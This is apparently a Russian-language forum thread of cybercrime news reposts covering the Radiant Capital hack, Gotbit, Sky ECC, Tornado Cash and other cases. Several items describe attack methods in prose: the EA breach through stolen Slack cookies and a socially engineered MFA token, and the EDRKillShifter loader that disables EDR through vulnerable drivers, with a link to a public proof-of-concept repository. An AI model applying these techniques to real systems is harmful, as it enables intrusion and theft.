"Мне нужно было притвориться, что я все еще в Москве", — сказал Парубец. "Чтобы выиграть время".
Источник: https://techcrunch[.]com/2024/12/05/russian-programmer-says-fsb- agents-planted-spyware-on-his-android-phone/
Что меняется:
— Полная бронь сохраняется только за силовыми структурами и компаниями с гособоронзаказом – они могут забронировать всех сотрудников;
— Для остальных вводят лимиты:
• «Органы управления» — до 95% сотрудников;
• Компании с мобзаданиями от Правительства — до 95%;
• Организации, связанные с Центробанком, «Росатомом» и «Роскосмосом» — до 85%;
• Компании с заданиями от местных властей — до 75%.
— Текущие брони действуют до 21 марта 2025 года, потом начнут работать новые правила;
— Правительство впервые чётко определило, сколько людей можно бронировать — раньше таких данных не было.Click to expand...
Новые правила вступают в силу с 21 марта 2025 года.
В Китае задержали местного чиновника Ван Момоу, который активно занимался инвестированием в криптовалюту. В какой-то момент всё пошло не по плану и Ван оказался должен немалую сумму денег.
Чтобы покрыть долг, нерадивый инвестор не придумал ничего лучше, как связаться с иностранной разведкой, а затем продать ей секретные данные за $140 000.
Итог = пожизненное.
По материалам регионального УФСБ возбуждены уголовные дела в отношении преступной группировки за создание, использование и распространение вредоносных компьютерных программ.
ФСБ и МВД России на территории Забайкальского и Краснодарского краёв, а также Калининградской области пресечена противоправная деятельность межрегиональной преступной кибергруппировки из числа уроженцев Забайкалья. В результате проведения комплекса оперативно-разыскных мероприятий и следственных действий установлено, что члены преступной группы с 2021 года занимались созданием, использованием и распространением вредоносных приложений для мобильных устройств. В последующем злоумышленники при помощи вирусов получали доступ к банковским и платежным сервисам потерпевших и совершали хищение находящихся на их счетах денежных средств, которыми распоряжались в целях личного обогащения.
Для расширения географии противоправной деятельности члены кибергруппировки постоянно привлекали к совершению преступлений сообщников, в числе которых были и граждане Украины, которым перечислялась часть похищенных денег.
В настоящее время организаторы и активные участники группировки задержаны и помещены под стражу, в отношении них возбуждено уголовное дело, по местам их жительства и пребывания проведены обыски, в которых изъяты телефоны, компьютерная техника, средства платежей со следами преступной деятельности.
• Video: https://t.me/antiterrorzk/38
или
США подали уведомление о продаже криптовалюты на сумму более 130 миллионов долларов, связанных с давно закрытой даркнет-площадкой Silk Road. Речь идет о двух лотах — 2800 BTC (129 миллионов долларов) и 58 BTC (3 миллиона долларов).
Эта криптовалюта принадлежала владельцу одного из маркетплейсов на Silk Road Райану Фараче (Ryan Farace), который в 2023 году был приговорен судом штата Мэриленд Мэриленде к 4,5 года заключения по обвинению в заговоре с целью отмывания денег. Другим обвиняемым по этому делу стал отец Фараче, пытавшийся помочь сыну спрятать деньги с криптовалютных кошельков, выведя их на счет в одном из европейских банков. Он получил 19 месяцев тюрьмы.
Что любопытно, часть выставленной на продажу крипты успела побывать в кошельках еще одного человека — бывшего агента Секретной службы США Шона Бриджеса (Shaun Bridges), который принимал участие в распутывании клубка Silk Road, но не устоял перед соблазном и украл часть средств, к которым получил доступ. Бриджес добровольно выдал украденное и уже успел отбыть шестилетний срок, который получил в 2015 году.
Китайская ассоциация кибербезопасности (CSAC) обвинила (https://www.theregister.com/2024/10/16/china_intel_chip_security/) компанию Intel в наличии бэкдоров в её процессорах, встроенных по указанию Национального агентства безопасности США (NSA). По мнению CSAC, подобные уязвимости в процессорах Intel представляют собой серьёзную угрозу национальной безопасности Китая, особенно для критической информационной инфраструктуры. Ассоциация кибер безопасности призывает китайские органы безопасности провести тщательное расследование продукции Intel, чтобы защитить национальные интересы и права потребителей.
Утверждается (https://mp.weixin.qq.com/s/rgRmOfoPr7x1TZhyb-1ifg), что в процессорах Intel, начиная с 2008 года, встроена технология Management Engine (ME), которая является частью широко разрекламированной технологии AMT (Active Management Technology) и позволяет администраторам удалённо выполнять различные команды на компьютере. Если функция активирована и есть инет, то доступ к компьютеру может быть получен удаленно, вне зависимости от того — установлена ли на нем операционная система или нет.
Эксперт по аппаратной безопасности Дэмиен Заммит утверждает, что ME - это бэкдор, который позволяет получить полный доступ к памяти, обойти брандмауэр операционной системы, отправлять и получать сетевые пакеты без ведома пользователя. Самое неприятное — пользователь не может отключить Active Management Technology.
Кроме того, китайские специалисты отмечают вклад российских исследователей по безопасности в 2017 году — Марка Ермолова и Максима Горячего из компании Positive Technologies, которые обнаружили скрытый "переключатель" (<https://threatpost.com/intel-confirms-its-much-loathed-me-feature-has-a- kill-switch/127739/>). Kill Switch предположительно был создан Агентством национальной безопасности США (NSA) и находится в бите HAP (High Assurance Platform) в поле PCHSTERP0 — так пишут китайцы.
В официальной документации об этом ничего не сказано. Наличие Kill Switch предполагает то, что NSA могут отключать ME на устройствах в США, в то время как во всём остальном мире ME продолжает функционировать, оставляя другие системы потенциально уязвимыми.
Radiant Capital взломали на более чем $50 млн.
Поддерживаемый Binance Labs лендинг-протокол Radiant Capital подвергся атаке
на сумму более $50 млн.
Хакер заполучил закрытые ключи трех из 11 подписей и изменил смарт-контракты.
Лендинговый протокол Radiant Capital подвергся взлому в сетях BNB Chain и
Arbitrum. Команда призвала отозвать разрешения для затронутых контрактов с
помощью сервиса Revoke.
Please revoke access to the following contracts on https://t.co/JqPsJBBfNS.
0xF4B1486DD74D07706052A33d31d7c0AAFD0659E1
0x30798cFe2CCa822321ceed7e6085e633aAbC492F
0xd50Cf00b6e600Dd036Ba8eF475677d816d6c4281
0xA950974f64aA33f27F6C5e017eEE93BF7588ED07 https://t.co/x4l7J8UVeT
— Radiant Capital (@RDNTCapital) October 16, 2024__https://twitter.com/x/status/1846673545973432333
Click to expand...
Общая сумма убытков превысила $50 млн, свидетельствуют данные Ancilia.
4/ thanks for the update from replies. Seems like Arbitrum contract was hacked, too:https://t.co/E7kLLavJ7C
The total lost is > $50M now.
— Ancilia, Inc. (@AnciliaInc) October 16, 2024__https://twitter.com/x/status/1846618258163761551
Click to expand...
«Мы заметили несколько переводов с аккаунтов пользователей с помощью transferFrom через контракт 0xd50cf00b6e600dd036ba8ef475677d816d6c4281. Пожалуйста, отмените разрешения как можно скорее. Похоже, что новая имплементация имела уязвимые функции», — отметили эксперты Ancilia.
Click to expand...
Эксплойт transferFrom использует функцию смарт-контракта, чтобы позволить
одному аккаунту отправить определенное количество токенов с учетной записи
жертвы на третий кошелек. Как правило, для этого от атакованного требуется
разрешение на взаимодействие с поддельным адресом.
По информации Ancilia, бэкдор-контракт был развернут примерно в 20:09 Киев/МСК
16 октября.
Ты должен был бороться со злом
Ancilia случайно поделилась инструментом для кражи средств с криптовалютных
кошельков в попытке помочь пользователям.
В теперь уже удаленном твите компания опубликовала мошенническую ссылку с
фейкового аккаунта Radiant, обратил внимание пользователь с ником Spreek.
For fuck's sake, if you are a 'trusted' security account, you need to absolutely make sure to never do this pic.twitter.com/2jrpN7P00L
— Spreek (@spreekaway) October 16, 2024__https://twitter.com/x/status/1846637474467975648
Click to expand...
Ancilia попросила пользователей отозвать разрешения, «перейдя по ссылке из официального сообщения». В реальности она вела на инструмент для кражи средств.
3 из 11 подписей взломаны.
Специализирующаяся на кибербезопасности фирма De.Fi сообщила об убытках на сумму более $58 млн.
~$58,000,000 Exploit Alert
Radiant Capital contracts were exploited on BSC & ARB chains with the 'transferFrom' function, which allowed to drain users' funds, namely $USDC $WBNB $ETH and others
Revoke approvals ASAP
0xd50cf00b6e600dd036ba8ef475677d816d6c4281 pic.twitter.com/oUHyshwEmL
— De.Fi Antivirus Web3 (@De_FiSecurity) October 16, 2024__https://twitter.com/x/status/1846624940440572405
Click to expand...
Radiant контролируется кошельком с мультиподписью с 11 подписантами. Злоумышленник, судя по всему, смог получить закрытые ключи трех из них. Этого оказалось достаточно для обновления смарт-контрактов платформы, подчеркнули De.Fi.
Unfortunately, yes.
However, this time, the nature of the hack is different — as in the first time, it was hacked via the flash loan; and now due to the fact that the hacker managed to get access to 3 signers — thus managed to transfer ownership and upgrade the contracts
— De.Fi Antivirus Web3 (@De_FiSecurity) October 16, 2024__https://twitter.com/x/status/1846629116289659386
Click to expand...
Поддержка Binance
В июле 2023 года венчурное подразделение крупнейшей криптобиржи Binance
инвестировало $10 млн в Radiant. Также проект запускался на Binance
Launchpool.
Сообщения о взломе платформы привели к падению курса токена RDNT — за
последние сутки он потерял 10%.
Radiant — кроссчейн-протокол, который предлагает возможность брать и давать
криптовалюту взаймы. В январе он потерял $4,5 млн в результате атаки.
Битва за раскопки может привести к крупной судебной тяжбе.
В Уэльсе разворачивается необычная юридическая битва между IT-инженером и городским советом Ньюпорта. Джеймс Хауэллс подал иск против местных властей в попытке получить разрешение на раскопки городской свалки, где, по его мнению, находится жесткий диск с ключом доступа к 8000 биткоинов.
История началась в 2013 году, когда Хауэллс по ошибке выбросил жесткий диск, содержащий приватный ключ к криптовалютному кошельку. За прошедшее десятилетие стоимость утерянных биткоинов значительно выросла и сейчас оценивается примерно в 514,37 миллиона долларов США.
Инженер предложил городскому совету 10% от стоимости биткоинов в случае успешного обнаружения жесткого диска. Хауэллс собрал команду экспертов по раскопкам, готовых провести операцию за 10 миллионов фунтов стерлингов, не требуя финансового участия со стороны совета.
По словам Хауэллса, муниципальные власти упустили уникальную возможность преобразить город. При положительном решении вопроса в 2013 году Ньюпорт мог бы сейчас выглядеть как Лас-Вегас или Дубай. Предложенная городскому совету сумма в 41 миллион фунтов стерлингов по текущему курсу может значительно вырасти в будущем.
Примечательно, что владелец добыл криптовалюту самостоятельно, затратив на майнинг лишь несколько пенни за электроэнергию. Слушание по делу назначено на декабрь. Представители городского совета считают иск необоснованным, ссылаясь на потенциальный вред окружающей среде от проведения масштабных раскопок.
Ранее администрация мусорного полигона установила круглосуточное видеонаблюдение и охрану территории.
cybernews.com/crypto/wales-man-landfill-dig-bitcoin-search
В Португалии по запросу США задержан основатель и гендиректор криптовалютной компании-маркетмейкера Gotbit 26-летний россиянин Алексей Андрюнин. Минюст США обвиняет его и еще три маркетмейкера в манипулировании рынком и фиктивных торгах криптовалютными токенами. Андрюнин, которого также обвиняют в мошенничестве и отмывании денег, ожидает экстрадиции в Америку.
Минюст США выдвинул первые в истории уголовные обвинения против финансовых компаний в манипулировании рынком и фиктивной торговле в криптовалютной индустрии. В Бостоне были предъявлены обвинения руководителям четырех криптовалютных компаний, четырех фирм по предоставлению финансовых услуг криптовалют (так называемые маркетмейкеры) и сотрудникам этих фирм.
Четверо обвиняемых признали себя виновными, еще один согласился признать себя виновным. На этой неделе власти задержали еще троих обвиняемых в Техасе, Великобритании и Португалии. Было изъято более $25 млн в криптовалюте, а несколько торговых ботов, которые проводили фиктивные сделки на миллионы долларов, были деактивированы.
В ночь на 10 октября стало известно, что в Португалии по запросу США задержали главу криптовалютной компании-маркетмейкера Gotbit Алексея Андрюнина.
Gotbit и еще три компании — ZM Quant, CLS Global и MyTrade в той или иной форме предоставляли услуги маркетмейкинга и создания ликвидности для криптовалютных токенов.
Все компании обвиняются в манипулировании рынком, в частности, в фиктивных сделках (wash trading) для искусственной накрутки торговых объемов торгов для токенов, поясняет РБК. Каждая из компаний в основном работала с низколиквидными криптоактивами второго эшелона и мемкоинами.
В чем обвиняют Алексея Андрюнина
Согласно судебным документам, Gotbit был известным маркетмейкером в криптобизнесе, основателем и гендиректором которого является 26-летний Алексей Андрюнин с гражданствами России и Португалии. Он был задержан 8 октября в Португалии и теперь ожидает экстрадиции в США. Также задержаны еще двое россиян из Gotbit — директор по созданию рынка Федор Кедров и директор по продажам Кави Джалили.
Они обвиняются в мошенничестве с использованием электронных средств и сговоре с целью совершения рыночных манипуляций и мошенничества.
Андрюнин также обвиняется в отдельном уголовном деле о мошенничестве с использованием электронных средств, сговоре с целью совершения рыночных манипуляций и мошенничестве и сговоре с целью отмывания денег.
По версии обвинения, с 2018 по 2024 год Gotbit предоставлял услуги рыночных манипуляций и фиктивной торговли нескольким криптовалютным компаниям, включая компании, расположенные в США. Gotbit якобы совершал фиктивные сделки на миллионы долларов от имени клиентов и получал десятки миллионов долларов в качестве выручки за эти незаконные услуги.
В одном из интервью 2019 года Андрюнин описывал, как он разработал код для фиктивной торговли и искусственного завышения объема торговли криптовалютой. Андрюнин отслеживал рыночные манипуляции Gotbit, в том числе с помощью электронных таблиц, которые сравнивали «созданный объем» от фиктивных сделок с естественным «рыночным объемом». Сотрудники Gotbit, включая Джалили и Кедрова, описывали потенциальным клиентам эти тактики фиктивной торговли и то, как избежать обнаружения.
Операция «Зеркала токенов»
«Это расследование, первое в своем роде, выявило многочисленных мошенников в криптовалютной индустрии. Фиктивная торговля давно запрещена на финансовых рынках, и криптовалюта не является исключением», — заявил исполняющий обязанности прокурора США Джошуа Леви.
По его словам, это случаи, «когда инновационная технология — криптовалюта — сталкивается со схемой вековой давности — pump and dump ».
«Сегодняшний посыл таков: если вы делаете ложные заявления, чтобы обмануть инвесторов, — это мошенничество. Точка. Наше ведомство будет агрессивно преследовать мошенничество, в том числе в криптовалютной индустрии», — пообещал Леви.
Для расследования против Gotbit и других криптовалютных компаний ФБР создало собственный криптотокен NexFundAI и зарегистрировало одноименную компанию. Под ее именем ФБР заключило договор, чтобы доказать факты накрутки объемов торговли и манипулирования рынком.
По словам участвовавшего в расследовании агента ФБР Джоди Коэна, «ФБР пошло на беспрецедентный шаг, создав свой собственный криптовалютный токен и компанию, чтобы идентифицировать, пресечь и привлечь к ответственности этих предполагаемых мошенников».
«То, что раскрыло ФБР в этом деле, по сути, является новым поворотом в финансовых преступлениях старой школы. Операция «Зеркала токенов» была направлена против недобросовестных разработчиков токенов, промоутеров и маркетмейкеров в криптопространстве», — сказал агент ФБР.
• Source: https://www.justice[.]gov/usao-ma/pr/eighteen-individuals-and- entities-charged-international-operation-targeting-widespread
Молодой человека изучал вредоносные компьютерные программы, сообщает во вторник, 17 сентября, УФСБ России по Башкирии.
По данным правоохранительных органов, с января 2023 года по март 2024 года 31-летний уфимец активно искал информацию о способах несанкционированного уничтожения и модификации компьютерной информации.
Он находил базы данных с логинами и паролями от почтовых ящиков, а также инструкции по совершению компьютерных атак. Это поведение насторожило сотрудников ФСБ, которые решили предупредить злоумышленника о недопустимости его намерений.
Важно отметить, что предостережение касается статьи 274.1 Уголовного кодекса Российской Федерации, которая подразумевает уголовную ответственность за неправомерное воздействие на критическую информационную инфраструктуру. Таким образом, уфимец был предупрежден о том, что продолжение его действий может привести к серьезным последствиям.
зарегистрированы товарные знаки для банковских услуг и крипты.
Компания отказывается терять российский рынок и планирует вернуться. К слову, Visa и Mastercard перестали обслуживать российские карты в 2022 году.
Владелец одной из российских лабораторий стал жертвой мошенника, поставлявшего прекурсоры с трекерами. Об этом он рассказал обвинив в сотрудничестве с ФСБ 34-летнего Расима Керимова, якобы находящегося в СИЗО Смоленска.
«Сливая людей, он продлевает свое нахождение там. В лагере ему [придет конец], поэтому он всеми силами пытается задержаться в СИЗО, сливая всех, кого получится», — говорится в видеоролике, оказавшемся в распоряжении редакции.
По словам владельца лаборатории, Керимов порекомендовал ему магазин химии с низкими ценами. За набор для изготовления 40 килограммов альфа-ПВП там потребовали всего миллион рублей, что сильно ниже стандартных цен. После этого Керимов прислал выполненный с помощью Fake GPS скриншот с места мастер-клада в тупиковой локации на съезде с Минского шоссе в Подмосковье.
Собеседник отметил, что за время поиска локации на автомобиле его склада был размещен датчик слежения (первые три фото), однако сам клад (на самом деле — выполненный ФСБ муляж) найти не удалось, благодаря чему сотрудник избежал обвинений в попытке сбыта в особо крупном размере. Однако на допросах ему показывали записи с камер и фотоловушек из леса, где он искал мастер-клад.
Кроме того, в другом случае химики лаборатории обнаружили трекеры в поставленных реактивах (на последнем снимке). Это произошло уже в тот момент, когда канистры из-под прекурсоров разрезали, чтобы в дальнейшем их утилизировать. Сотрудники лаборатории были арестованы, им предъявлены обвинения по ст. 228.4 УК РФ (незаконные производство, сбыт или пересылка прекурсоров).
Деятельность лаборатории и связанного с ней наркошопа, существовавшего с 2019 года, была прекращена, все оставшиеся на свободе сотрудники получили указание уничтожить улики.
Порталу Motherboard удалось выяснить детали проникновения группы хакеров в закрытую корпоративную сеть Electronic Arts, из которой они похитили 780 Гбайт информации. Как оказалось, злоумышленники обманули внутреннюю техническую поддержку компании.
Представитель хакеров в разговоре с журналистами Motherboard сообщил, что взлом начался с покупки украденных файлов cookie за $10. Эти файлы позволили им получить доступ к закрытому корпоративному каналу Electronic Arts в мессенджере Slack. В файлах cookie могут сохраняться данные логина конкретных пользователей. Злоумышленники могут использовать эти данные для авторизации в сервисе, притворившись человеком, который имеет к нему доступ. В случае канала Electronic Arts в мессенджере Slack так и произошло.
«Попав в чат, мы написали членам IT-поддержки [EA] и объяснили, что “потеряли” телефон на прошлой вечеринке», — сказал представитель хакеров порталу Motherboard.
Хакеры попросили у поддержки токен для мультифакторной аутентификации, чтобы получить доступ к корпоративной сети Electronic Arts. По словам злоумышленников, затея оказалась успешной два раза. Попав во внутреннюю сеть, хакеры нашли сервис разработчиков EA для компиляции игр. Они успешно авторизовались в нём, а затем создали виртуальную машину, которая открыла для них более подробную информацию о структуре внутренней сети EA, а также предоставила доступ к ещё одному сервису. Через него взломщики и украли исходный код движка Frostbite, FIFA 21, а также прочие файлы общим объёмом более 780 Гбайт.
Представитель группы хакеров предоставил Motherboard скриншоты, на которых показаны все шаги взлома, включая их общение с IT-поддержкой EA в мессенджере Slack. Electronic Arts, в свою очередь, подтвердила описанную версию проникновения в их закрытую сеть.
Ранее в официальном заявлении EA указала, что расследует инцидент с проникновением в свою внутреннюю сеть, из которой был похищен ограниченный объём исходного кода и инструментов для работы с ним. Тогда же компания отметила, что личные данные игроков не были похищены. После инцидента безопасность сети была усилена. В издательстве считают, что произошедший случай не окажет негативного влияния на его игры или бизнес. Компания обратилась в правоохранительные органы и к сторонним экспертам по безопасности для проведения расследования.
Представитель хакеров также поделился с Motherboard некоторыми украденными документами. В них содержатся различные материалы о PlayStation VR, данные о том, как EA создаёт цифровые толпы в FIFA, а также информация о работе искусственного интеллекта в играх компании.
Верховный суд Бразилии постановил [заблокировать](https://www.theguardian.com/technology/article/2024/aug/30/elon- musk-x-could-face-ban-in-brazil-after-failure-to-appoint-legal- representative) в стране соцсеть X (бывший Twitter) и штрафовать граждан за доступ к X через VPN на 50 тыс. бразильских реалов в сутки ($8,9 тыс.). Судья Александре ди Мораис (Alexandre de Moraes) также приказал магазинам приложений Google Play и App Store удалить клиенты X (Twitter) и VPN- приложения, которые могут задействовать пользователи для обхода ограничений. Apple и Google нужно выполнить указание суда в течение пяти дней.
Click to expand...
(c) https://habr.com/ru/news/839966/
эй, роскомназдор - что-то вы отстаете от мировых трендов! )
Когда уже будет тариф "VPN.Особый - целых 5 суток отдыха "все включено" за
каждое подключение к X" ?
Управление по контролю за иностранными активами (OFAC, Office of Foreign Assets Control), подразделение Министерства финансов США, ввело санкции против децентрализованного миксер-сервиса Tornado Cash.
Власти заявляют, что в общей сложности через Tornado Cash, созданный в 2019 году, было отмыто более 7 миллиардов долларов, а его операторы не смогли или не захотели ввести «эффективные меры контроля, призванные помешать отмыванию средств злоумышленников на регулярной основе».
К примеру, сообщается, что северокорейские хакеры из группировки Lazarus активно использовали этот миксер для своих операций. Так, через Tornado Cash прошли средства, похищенные хакерами в результате [взлома Harmony](https://medium.com/harmony-one/harmonys-horizon-bridge- hack-1e8d283b6d66) (порядка 96 млн долларов), средства полученные в результате компрометации блокчейна Ronin, тесно связанного с популярной NFT-игрой Axie Infinity (было украдено более 600 млн долларов, через миксер отмыли 455 млн), а также около 7,8 млн долларов, полученные во время недавней компрометации криптовалютного моста Nomad.
Кроме того, сообщается, что этот миксер использовался другими преступниками, чтобы затруднить отслеживание украденных средств. В том числе: после взлома музыкальной блокчейн-платформы Audius, DeFi-платформы Beanstalk, децентрализованной биржи Uniswap, а также exit scam’а Arbix Finance.
Теперь, в соответствии с санкциями, заблокированы оказались вся собственность и имущественные интересы Tornado Cash (находящиеся в США или во владении или под контролем лиц из США), о них необходимо сообщить в OFAC. Также граждане США и другие лица в Соединенных Штатах более не могут вести дела с Tornado Cash без специального разрешения от OFAC. Кроме того, любые организации, которые прямо или косвенно принадлежат таким людям на 50 и более процентов, также будут «забанены».
Напомню, что весной текущего года американские власти наложили аналогичные санкции на криптовалютный миксер Blender[.]io. По мнению властей, этот сервис тоже использовался хакерами из Северной Кореи для отмывания денег.
Операторы вымогателя RansomHub используют новую малварь для отключения EDR- защиты во время BYOVD-атак (Bring Your Own Vulnerable Driver, «Принеси свой уязвимый драйвер»).
Новый вредоносный инструмент получил название EDRKillShifter, и его обнаружили специалисты компании [Sophos](https://news.sophos.com/en-us/2024/08/14/edr- kill-shifter/), во время расследования вымогательской атаки в мае 2024 года. Сообщается, что малварь используется для доставки легитимных уязвимых драйверов на целевые устройства для повышения привилегий, отключения защитных решений и захвата контроля над системой.
«Во время майского инцидента злоумышленники (мы с умеренной долей уверенности предполагаем, что этот инструмент используется несколькими атакующими) попытались использовать EDRKillShifter для отключения защиты Sophos на целевом компьютере, но инструмент не сработал, — рассказываю эксперты. — Затем они попытались запустить исполняемый файл вымогательского ПО на контролируемой ими машине, но это тоже не удалось, когда сработала функция CryptoGuard».
Click to expand...
В ходе расследования Sophos выявила два разных образца малвари, оба с proof- of-concept эксплоитами доступными на GitHub: один использовал уязвимый драйвер RentDrv2, а другой — драйвер [ThreatFireMonitor](http://github.com/BlackSnufkin/BYOVD/tree/main/TfSysMon- Killer) (компонент устаревшего пакета для системного мониторинга).
Также Sophos сообщает, что EDRKillShifter способен доставлять различные полезные нагрузки, в зависимости от потребностей злоумышленников, а языковые свойства малвари указывают на то, что она была скомпилирована на компьютере с русскоязычной локализацией.
Выполнение загрузчика состоит из трех этапов: сначала злоумышленник запускает
бинарник EDRKillShifter с паролем для расшифровки и выполнения встроенного
ресурса с именем BIN в памяти. Затем этот код распаковывается и выполняет
финальную полезную нагрузку, которая загружает и использует уязвимый
легитимный драйвер для повышения привилегий и отключения в системе жертвы
активных процессов и служб EDR.

«После того как вредоносная программа создает новую службу для драйвера, запускает службу и загружает драйвер, она вступает в бесконечный цикл, который непрерывно перебирает запущенные процессы, завершая их, если их имя фигурирует в жестко заданном списке целей, — говорят исследователи. — Также стоит отметить, что оба варианта используют легитимные (хотя и уязвимые) драйверы и proofs-of-concept эксплоиты, доступные на Github. Мы подозреваем, что злоумышленники скопировали часть этих proofs-of-concept, изменили их и портировали код на Go».
Click to expand...
Для защиты от подобных атак Sophos рекомендует включать защиту от несанкционированного доступа в продуктах для защиты эндпоинтов, разграничивать права пользователя и администратора, чтобы злоумышленники не могли загрузить уязвимые драйверы, и поддерживать системы в актуальном состоянии, поскольку Microsoft регулярно отзывает подписанные драйверы, которые используются в атаках.
Правоохранительные органы Нидерландов и Бельгии сообщили о проведении совместных операций Argus и A-Limit, направленных на компанию Sky ECC, которая предоставила преступным группам по всему миру платформу для обмена зашифрованными сообщениями.
Sky ECC работала по той же схеме, что и печально известный Encrochat, о котором мы рассказывали ранее. Напомню, что телефоны Encrochat гарантировали своим пользователям абсолютную анонимность, так как не имели привязки устройства или SIM-карты к учетной записи клиента и приобретались в условиях, гарантирующих невозможность отследить их происхождение.
Операторы Sky ECC действовали по той же схеме: вносили физические изменения в свои телефоны (например, удаляли микрофоны и избавлялись от функций GPS), а также устанавливали на устройства собственные приложения для обмена зашифрованными сообщениями.
Клиенты компании могли использовать приложение Sky ECC на собственных устройствах под управлением Android, BlackBerry и iOS, или же могли приобрести уже модифицированные и защищенные аппараты. Помимо вышеописанных модификаций устройства оснащались тревожной кнопкой, с помощью которой можно было быстро стереть все данные в случае возникновения чрезвычайной ситуации или ареста. Аренда такого гаджета стоила от 800 до 2200 евро за полгода.

Сеть Sky ECC. Изображение с официального сайта
Торговые представители платформы в разных странах мира продавали эти девайсы от имени основной компании. Клиентами, как правило, выступали серьезные преступные группировки, включая торговцев наркотиками и оружием.
Нужно сказать, что упомянутый выше Encrochat был отнюдь не уникальным примером сервиса для зашифрованных коммуникаций, популярного в преступной среде. Еще в 2016 году голландская полиция закрыла другой похожий сервис, Ennetcom, модифицировавший смартфоны BlackBerry для нужд преступников. Другой яркий пример — компания Phantom Secure, которая долгие годы продавала защищенные телефоны наркокартелям, и чьей глава в итоге был приговорен к 9 годам лишения свободы в 2019 году.
«Во всем мире работают около 171 000 телефонов SKY ECC. В основном они находятся в Европе, Северной Америке, некоторых странах Центральной и Латинской Америки (Колумбия) и на Ближнем Востоке. Каждый месяц около 70 000 этих телефонов активно общаются через сеть SKY ECC, — пишут полицейские, добавляя, что около четверти активных пользователей платформы, находятся именно в Бельгии(6000) и Нидерландах (11 000). — Учитывая, что услуги, предоставляемые компанией, кажутся почти исключительно криминальными, в конце 2018 года федеральная прокуратура [Бельгии] решила начать расследование против SKY ECC и людей, которые поставляют эти телефоны преступному сообществу».
Click to expand...
Власти говорят, что сумели внедриться на платформу в середине февраля 2021 года и перехватили множество сообщений, которыми преступники обменивались через серверы компании. Как именно это было реализовано, пока не сообщается, лишь отмечается, что «помогло сотрудничество с Нидерландами». Зато, по данным бельгийских СМИ, речь идет о тысячах перехваченных сообщений, которые были прочитаны полицейскими в режиме реального времени. Хотя, похоже, операция была даже более масштабной:
«В общей сложности нами было перехвачено около миллиарда зашифрованных сообщений, почти половина из которых на сегодняшний день расшифрована», — гласит заявление бельгийской полиции. Следователи добавляют, что читали расшифрованные сообщения в реальном времени около трех недель.
Click to expand...
Когда проблемы только начались, представители Sky ECC утверждали, что кто-то создал поддельную версию их коммуникационного приложения, загрузил ее на небезопасные для клиентов телефоны, а затем продал эти девайсы по «неавторизованным каналам».
По сути, в компании заявили журналистам, что «ни одно авторизованное устройство Sky ECC не было взломано», а правоохранительные органы или кто-то другой рекламировали и продавали телефоны с поддельными фишинговыми приложениями на борту. Похоже, правоохранители проникли Sky ECC через эти скомпрометированные девайсы и некоторое время наблюдали за преступниками, что в итоге позволило им произвести аресты, о которых сообщили теперь.
Полицейские рассказывают, что они использовали полученный доступ к платформе для сбора информации о клиентах Sky ECC предотвращения насильственных преступлений, включая похищения, убийства и перестрелки.
В Нидерландах правоохранители совершили рейды на 75 домов и офисов, а также произвели 30 арестов. В Бельгии более 1500 полицейских провели 200 обысков домов и арестовали 48 подозреваемых.
Суммарно в ходе операции было изъято около 1,2 миллиона долларов, 15 запрещенных видов оружия (включая шесть единиц огнестрельного оружия), восемь дорогих автомобилей, три машины для подсчета денег, полицейская форма и GPS- трекеры.
Подчеркивается, что изъятые средства были получены от незаконного оборота наркотиков. Дело в том, что по сообщениям местных СМИ, большинство подозреваемых были арестованы в районе портового города Антверпен, который давно считается воротами для доставки наркотиков в Европу и из Европы. Так, расследование в отношении Sky ECC началось после того, как после того, в Антверпене конфисковали контейнер с 2,8 тоннами кокаина и обнаружили телефоны компании у арестованных подозреваемых.
Представители Sky ECC «решительно отвергают любые утверждения о том, что Sky ECC — это “платформа, которую предпочитают преступники”» и продолжают утверждать, что правоохранительные органы взломали не их платформу, а некую клонированную систему, созданную неавторизованными лицами. Фактически, компания обвиняет власти в нарушении прав на товарный знак, лжи, клевете и мошенничестве.
Источник: xakep.ru/2021/03/10/sky-ecc/
[ https://www.reuters.com/world/kim-dotcom-be-extradited-new-zealand- after-12-year-fight-with-us-2024-08-15/ ](https://www.reuters.com/world/kim- dotcom-be-extradited-new-zealand-after-12-year-fight-with-us-2024-08-15/)
The big fat cats dont forget him and still wanna get him behind bars because
of the humiliation raid we all saw the video ,at that time.
My two cents? If you use mega.nz stop using it in the future.
Шесть жителей Малайзии обвиняются в похищении китайского гражданина и требовании выкупа в размере 4,44 миллиона малайзийских ринггитов ($1 миллион) в Tether (USDT).
Обвиняемые, возраст которых составляет от 25 до 29 лет, предположительно похитили мужчину на одном из выездов с автотрассы, соединяющей города Куала- Лумпур и Путраджая, 11 июля. Группа запросила выкуп в размере 1 миллиона USDT (USDT) за освобождение жертвы. Согласно обвинительному акту, китайского гражданина незаконно удерживали с целью получения выкупа в размере 1 007 696 USDT.
Начальник полиции Селангора, Датук Хуссейн Омар Хан, подтвердил, что четыре
других члена банды были застрелены и убиты 3 августа в различных
столкновениях. Местная полиция также работает над поимкой четырех
дополнительных подозреваемых, связанных с похищением, все они являются членами
банды из 18 человек, имеющей большой опыт в похищениях.
После рассмотрения всех аргументов и природы обвинений, суд принял решение не
предоставлять залог.Судья Амир Эффенди
15 августа шестеро обвиняемых не признали себя виновными в обвинениях в
похищении. Судья Амир Эффенди отказал в предоставлении залога предполагаемым
похитителям и назначил следующее судебное заседание на 8 октября. В случае
осуждения по Акту о похищениях, шесть малайзийцев будут приговорены к
тюремному заключению на срок от 30 до 40 лет с наложением физических
наказаний.
Данное дело подчеркивает опасность использования криптовалюты в криминальных
деяниях и сложность следственных процедур, связанных с такими случаями.
Следствие продолжается, и полиция Малайзии активно работает над поимкой всех
участников данного преступного синдиката.
nst.com.my/news/crime-courts/2024/08/1091879/six-people-charged-kidnapping- chinese-national-watch
ФБР ликвидировало серверы и сайты, связанные с деятельностью группы вымогателей RADAR/DISPOSSESSOR. Операция была проведена совместно с партнёрами из Великобритании и Германии.
В результате правоохранительными органами были конфискованы серверы и домены, которые использовались хакерами для осуществления атак. В частности, были изъяты 3 сервера в США, 3 сервера в Великобритании, 18 серверов в Германии, а также несколько доменов (radar[.]tld, dispossessor[.]com, cybernewsint[.]com и другие). Сайты служили как для координации атак, так и для создания ложных новостных и видеоплатформ.
С августа 2023 года группировка DISPOSSESSOR, возглавляемая киберпреступником по имени Brain, атаковала малый и средний бизнес в разных странах, включая США, Аргентину, Австралию, Германию и другие. Всего пострадало 43 компании. Хакеры проникали в сети через уязвимости, слабые пароли и отсутствие многофакторной аутентификации, крали данные и шифровали устройства жертв, лишая их доступа к информации.
